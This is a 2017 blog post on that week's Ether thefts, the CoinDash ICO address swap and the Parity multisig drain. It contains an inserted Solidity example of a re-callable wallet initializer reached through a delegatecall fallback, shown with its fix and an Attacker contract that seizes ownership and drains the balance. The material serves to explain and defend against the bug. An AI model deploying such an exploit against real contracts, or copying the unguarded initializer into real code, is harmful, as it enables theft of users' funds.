Last Week in Cryptocurrency Theft

Bobby Williams
Jul 22, 2017 · 5 min read

On Tuesday, someone stole $32 million worth of Ether, Ethereum’s cryptocurrency. It was the largest cryptocurrency theft of the week, dwarfing the $10 million worth of Ether stolen from the CoinDash Initial Coin Offering (ICO) on Monday.

In Monday’s case, the theft came just as CoinDash was opening its ICO — crypto’s version of a fundraising event. The intention was for cryptocurrency token traders to send CoinDash their Ether, in exchange for CoinDash tokens. What good are CoinDash tokens? Well, the idea is that cryptocurrency token traders can use them on CoinDash’s token trading platform to reward other token traders for sharing their insights on token trading. Set aside the question of whether that sounds like a reasonable investment; the thing to recognize here is that this ICO event was the debut of the CoinDash token.

Unfortunately for CoinDash, some hacker had compromised their website, and been waiting for the exact moment when the ICO launched. So, when CoinDash posted their Ethereum address on the web, to open the floodgates for investors to send them Ether, the hacker simply replaced that address with their own address. By the time this had been discovered, and the warning gone out, Ether worth $7 million at the time had already been sent to the hacker — later increasing to over $10 million worth as additional Ether trickled in. CoinDash is now eating that loss to make investors whole.

There have been smaller-scale losses relating to the misrepresentation of ICO addresses before, but combining that trick with a compromise of the ICO’s own website was new. By contrast, the $32 million theft that happened on Tuesday was less “new trick” and more “suggestive of a critical weakness in the Ethereum ecosystem.”

In that case, the exploit was rooted in two design features of Solidity, the programming language used to write the “smart contracts” that are Ethereum’s raison d’être: a contract can forward any call it does not recognise to a shared library contract via delegatecall, which runs the library’s code against the calling contract’s own storage, and functions are public unless declared otherwise. Haseeb Qureshi explains it pretty well here, if you want to know the details. Suffice it to say, the language made it very easy to write a certain kind of bug, and that’s what a developer did. Unfortunately, this particular bug happened to be in a very important part of a contract distributed as part of a widely used project.

The code in question was part of a multi-signature wallet, a contract built for holding Ether on behalf of several owners. The wallet forwarded calls it did not recognise to a shared library, and the library’s initialization function, the one that sets the owners, could be invoked again on a wallet that had already been initialized. The bug enabled a hacker to make themselves the owner of the wallet, and then drain all the funds into one of their own accounts. Gavin Wood, the developer, didn’t notice this possibility when the code was written. In his defence, however, this code was being run by hundreds of people — many of whom would claim to be security experts — and nobody else noticed it either. At least until Ether started disappearing from wallets.
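The mechanism in a nutshell, as an added example that is neither Parity’s wallet code nor anything from the original article: a deliberately reduced single-owner wallet that forwards unknown calls to a shared library, the two transactions an attacker needs, and the guard that closes the hole. The contract names, the single-owner reduction, the `initialized` flag and the `Attacker` contract are assumptions made for illustration; the real wallet had multiple owners, daily limits and many more functions.

```solidity
pragma solidity ^0.4.11;

// Added illustration of the bug class discussed above; this is NOT Parity's
// wallet code. Contract and function names, the single-owner simplification
// and the Attacker contract are assumptions made for the example.

// Shared library. Wallets forward calls to it with delegatecall, so its code
// runs against the *wallet's* storage: the slot layout must match Wallet below.
contract WalletLibrary {
    address public owner;       // slot 0 (mirrored in Wallet)
    bool    public initialized; // slot 1 (mirrored in Wallet)

    // VULNERABLE: meant to act as a one-time constructor, but it is public
    // (the default in Solidity 0.4) and nothing stops a second call, so anyone
    // who can reach it through a wallet's fallback can take ownership.
    function initWallet(address _owner) {
        owner = _owner;
    }

    // Sends the wallet's Ether; only the current owner may call it.
    function execute(address _to, uint _value) {
        require(msg.sender == owner);
        _to.transfer(_value);
    }
}

// The same library with a guard of the kind Parity's fix added: a modifier
// that rejects initialisation once the wallet has already been set up.
contract HardenedWalletLibrary {
    address public owner;       // slot 0 (mirrored in Wallet)
    bool    public initialized; // slot 1 (mirrored in Wallet)

    modifier only_uninitialized { require(!initialized); _; }

    function initWallet(address _owner) only_uninitialized {
        owner = _owner;
        initialized = true;
    }

    function execute(address _to, uint _value) {
        require(msg.sender == owner);
        _to.transfer(_value);
    }
}

// The thin wallet users actually deploy. It holds the Ether; the logic lives
// in whichever library address it was constructed with.
contract Wallet {
    address public owner;       // slot 0, must mirror the library
    bool    public initialized; // slot 1, must mirror the library
    address private lib;        // slot 2, wallet-only

    function Wallet(address _lib, address _owner) payable {
        lib = _lib;
        // Run the library's initialiser against this contract's storage.
        require(lib.delegatecall(bytes4(keccak256("initWallet(address)")), _owner));
    }

    // Fallback: any call the wallet does not recognise is forwarded to the
    // library. With WalletLibrary that includes initWallet, which is the whole
    // problem; with HardenedWalletLibrary the repeated call reverts.
    function () payable {
        if (msg.data.length > 0) {
            require(lib.delegatecall(msg.data));
        }
    }
}

// The theft reduced to two calls. Against a wallet backed by WalletLibrary
// hijack() succeeds; against one backed by HardenedWalletLibrary step 1
// reverts and no Ether moves.
contract Attacker {
    function hijack(address wallet) {
        // 1. "Re-run the constructor" through the fallback: with the vulnerable
        //    library this overwrites slot 0 of the wallet with our address.
        require(wallet.call(bytes4(keccak256("initWallet(address)")), address(this)));
        // 2. Now that we are the owner, send the wallet's whole balance to us.
        require(wallet.call(bytes4(keccak256("execute(address,uint256)")),
                            address(this), wallet.balance));
    }

    function () payable {}
}
```

Two things worth noticing when you read it. First, the danger is not delegatecall itself but the combination of an open-ended fallback with a library function that has no re-entry guard; an equally valid fix is to have the fallback forward only a whitelist of function selectors. Second, because the library executes against the wallet’s storage, the leading state variables of `Wallet` and the library must be declared in the same order; a layout mismatch is its own class of bug, which is why both contracts here carry matching comments on the slots.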

A startup called Swarm City was the first to notice, when they lost $10 million worth of Ether from their wallet. In total, three wallets were drained, containing $32 million worth of Ether. That’s the bad news. The good news is that another $85 million that might have been stolen, wasn’t. Or rather, it was stolen by the good guys — the “White Hat Group” of hackers, who recovered funds from wallet contracts that were at risk using the same trick the thief was using. These funds are expected to be returned to their rightful owners.

The rest of that Ether is likely gone. While there are ways of tracing crypto tokens, consider that, the last time this much Ether was stolen from a janky smart contract — last year’s legendary attack on The DAO — nobody ever figured out who did it. Moreover, unlike what happened after The DAO, there will be no forking the Ethereum blockchain to undo the damage this time.

A Dash for the Timber, 1889 — Frederic Remington

Losses due to theft — ranging from small amounts on up into values of tens of millions of dollars — even hundreds of millions in the case of the Mt. Gox debacle — are an unfortunately common aspect of cryptocurrencies. While crypto-enthusiasts will go on at length about the security of blockchains, the security they are describing is fairly one-dimensional. Yes, blockchains can provide the security needed to assure that the same tokens cannot be spent twice. That’s important. Essential, actually. But, as these and other thefts have demonstrated, there are still a maddening variety of other moving parts within the digital currency ecosystem — websites, wallets, exchanges and the contracts themselves — where security failures are both common and expensive. Until these issues are more effectively resolved, it’s probably for the best that this technology has yet to break through to mass adoption and the consumer market.

The good news for the crypto community, however, is that blockchain technology exhibits the quality known as “antifragility.” Antifragility — a term coined by Nassim Nicholas Taleb — means that, when a system is stressed or attacked, it recovers from the attack stronger than it was before. For example, now that it has been demonstrated that the website of an ongoing ICO is a point of vulnerability through which tokens can be stolen, industry participants have taken notice and are changing their practices so that it will be significantly more difficult to accomplish a similar stunt in the future.

In the case of the Ether that was stolen as a result of the bug in Solidity code, there are already discussions underway about how the language can be changed to prevent this class of problem (for example, requiring function visibility to be declared explicitly rather than defaulting to public), and about mechanisms that can help to enable the recovery of funds in the event that a similar hijacking should occur in the future. While it’s becoming clear that — this being software — some bugs are inevitable, we are likely to see better practices established for finding these problems. This includes the broader institution of bug bounties — cash rewards to those who find and report security flaws in code before they can be exploited. It’s also likely that some type of insurance mechanism will emerge to enable the restoration of tokens to those who become the victims of this type of crime in the future.

Cryptocurrency thefts, like those that happened this past week, can cause a lot of damage. This includes financial damage to those who were directly affected, as well as reputational damage to the broader ecosystem. But they also demonstrate that there is still much about this tech that remains to be explored and understood. The world of blockchain technology has recovered from similar incidents in the past, and is more resilient today because of those experiences. That which does not kill it will make it stronger.

Software developer, writer, former officer of the U.N. Secretariat.
